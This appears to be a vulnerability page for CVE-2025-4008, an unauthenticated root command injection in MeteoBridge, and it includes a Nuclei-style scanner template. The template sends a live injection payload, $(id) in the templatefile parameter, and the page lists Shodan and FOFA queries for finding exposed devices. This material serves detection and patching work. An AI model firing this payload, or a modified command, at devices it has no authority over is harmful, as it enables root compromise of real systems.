CVE-2025-4008: MeteoBridge <= 6.1 - Remote Code Execution

2025-08-01 MeteoBridge PoC Public

Description

The Meteobridge web interface let meteobridge administrator manage their weather station data collection and administer their meteobridge system through a web application written in CGI shell scripts and C.This web interface exposes an endpoint that is vulnerable to command injection.Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges ( root ) on affected devices.

PoC

id: CVE-2025-4008

info:
  name: MeteoBridge <= 6.1 - Remote Code Execution
  author: iamnoooob,pdresearch
  severity: high
  description: |
    The Meteobridge web interface let meteobridge administrator manage their weather station data collection and administer their meteobridge system through a web application written in CGI shell scripts and C.This web interface exposes an endpoint that is vulnerable to command injection.Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges ( root ) on affected devices.
  impact: |
    Unauthenticated attackers can execute arbitrary operating system commands with root privileges through the templatefile parameter, achieving complete device compromise.
  remediation: |
    Upgrade MeteoBridge to version 6.2 or later that properly sanitizes input in template.cgi.
  reference:
    - https://forum.meteohub.de/viewtopic.php?t=18687
    - https://www.onekey.com/resource/security-advisory-remote-command-execution-on-smartbedded-meteobridge-cve-2025-4008
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4008
  classification:
    cve-id: CVE-2025-4008
    cvss-score: 7.5
    cwe-id: CWE-77
    epss-score: 0.93667
    epss-percentile: 0.99836
  metadata:
    verified: true
    shodan-query: "meteobridge"
    fofa-query: "Meteobridge"
  tags: cve,cve2025,meteobridge,rce,kev,vkev,vuln

http:
  - raw:
      - |
        GET /public/template.cgi?templatefile=$(id) HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Error: template file'
          - 'uid='
          - 'gid='
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402203aab95508b9698ed0e3050d5bc4a99d8cd0ad681bd1fe5504948418834613ed702203fdaa64e49ae58bac9a8a6aa2eb71c4c6ad111adcc5e73a9e02c175c77d17338:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities